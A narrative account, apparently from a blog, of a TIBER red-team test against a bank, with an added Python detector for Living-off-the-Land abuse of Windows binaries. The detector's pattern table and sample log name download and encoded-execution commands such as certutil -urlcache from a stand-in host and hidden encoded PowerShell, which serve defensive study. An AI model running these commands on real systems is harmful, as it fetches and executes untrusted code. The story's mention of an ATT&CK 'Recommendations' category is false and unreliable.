TIBER Red Team – A Story

Our TIBER red team was engaged by a large financial institution to conduct a simulated cyber attack against their systems. The goal of the engagement was to identify and prioritize vulnerabilities in the organization’s defenses, and to provide recommendations for improvement.

We started by gathering as much information about the organization as we could, using a variety of tactics from the MITRE ATT&CK framework’s “Initial Access” category. This included spearphishing campaigns targeting specific employees, purchasing and using information from the dark web, and even physically visiting the organization’s offices and taking note of any potential entry points.

Once we had a good understanding of the organization’s defenses and potential vulnerabilities, we moved on to the “Execution” phase of the attack. We used a number of tactics in this phase, including using legitimate credentials to access the organization’s systems, deploying malware through the use of phishing emails and infected USB drives, and leveraging zero-day vulnerabilities to gain access to sensitive data.

As we moved deeper into the organization’s systems, we encountered a number of challenges and roadblocks. The organization’s security team was quick to respond to our attacks and worked tirelessly to track our movements and shut down our access. In response, we had to continually adapt and find new ways to evade detection and maintain access.

One particularly effective tactic we used was “Living off the Land” – leveraging legitimate tools and resources already present on the organization’s systems to carry out our attacks. This allowed us to blend in with normal system activity and made it much harder for the security team to detect our presence.
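The flip side of "Living off the Land" is that the binaries are legitimate, so detection has to key on how they are invoked (unusual arguments) and by whom (unusual parent processes) rather than on the binary itself. The following detector is an added example written for this page from the defender's side; it is not the red team's tooling and not part of the original story. It assumes a constructed `timestamp|host|parent_image|image|command_line` log format and a small, hand-picked list of dual-use Windows binaries with the argument patterns that separate abuse from routine administration.

```python
"""Flag Living-off-the-Land activity in process-creation logs.

Added example, not part of the original page. The log format
'timestamp|host|parent_image|image|command_line' and the sample
lines below are constructed for illustration only.
"""
import re
from dataclasses import dataclass

# Built-in Windows binaries frequently repurposed by intruders, paired with
# command-line fragments that are rare in legitimate administrative use.
SUSPICIOUS_ARGS = {
    "certutil.exe": [r"-urlcache", r"-decode"],
    "powershell.exe": [r"-enc\w*\s", r"downloadstring", r"-nop\b", r"bypass"],
    "rundll32.exe": [r"javascript:", r"\.dll,\s*\w+\s+http"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "mshta.exe": [r"https?://", r"vbscript:", r"javascript:"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
    "bitsadmin.exe": [r"/transfer"],
}

# Office applications should almost never spawn a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    timestamp: str
    host: str
    image: str
    reason: str


def parse_line(line):
    """Split one log line into its five fields; return None if malformed."""
    parts = line.strip().split("|")
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmdline = parts
    return ts, host, parent.lower(), image.lower(), cmdline


def basename(path):
    """Return the file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def analyze(lines):
    """Run both heuristics over the log and return the list of findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crash the pipeline
        ts, host, parent, image, cmdline = rec
        parent_name = basename(parent)
        image_name = basename(image)
        low = cmdline.lower()

        # Heuristic 1: dual-use binary invoked with arguments typical of abuse.
        for pattern in SUSPICIOUS_ARGS.get(image_name, []):
            if re.search(pattern, low):
                findings.append(Finding(ts, host, image_name,
                                        f"suspicious argument /{pattern}/"))
                break

        # Heuristic 2: an Office application spawning a shell or script host.
        if parent_name in OFFICE_PARENTS and image_name in SHELLS:
            findings.append(Finding(ts, host, image_name,
                                    f"spawned by {parent_name}"))
    return findings


# Constructed sample log: two benign lines, three that should be flagged.
SAMPLE_LOG = [
    "2024-03-01T09:12:01Z|WS-0142|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -verify cert.cer",
    "2024-03-01T09:13:45Z|WS-0142|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c start /b powershell -w hidden",
    "2024-03-01T09:14:02Z|WS-0142|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
    "2024-03-01T10:02:10Z|SRV-07|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "2024-03-01T10:05:33Z|SRV-07|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc ZQBjAGgAbwA=",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} {f.image}: {f.reason}")
```

Run against the constructed log, the first `certutil` call (a plain certificate check) and the `svchost` line pass silently, while the Word-spawned `cmd.exe`, the `certutil -urlcache` download and the encoded PowerShell invocation each produce one finding. In a real deployment the pattern table would be tuned against a baseline of the organisation's own administrative activity, since the cost of this approach is false positives from administrators who legitimately use the same binaries.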

Ultimately, we were able to gain access to a number of sensitive systems and exfiltrate a large amount of data. However, our job was far from over – we still needed to document our findings and provide recommendations for improvement.

To do this, we used the MITRE ATT&CK framework’s “Impact” category to identify the potential consequences of our actions and the “Recommendations” category to provide guidance on how the organization could better defend against similar attacks in the future.

Some of the key recommendations we made included strengthening password policies, implementing two-factor authentication, regularly updating and patching systems, and investing in employee training to raise awareness of cyber threats.

Overall, the TIBER red teaming engagement was a challenging but rewarding experience. We were able to identify and exploit a number of vulnerabilities in the organization’s defenses, and our recommendations will help them to better protect themselves against future attacks.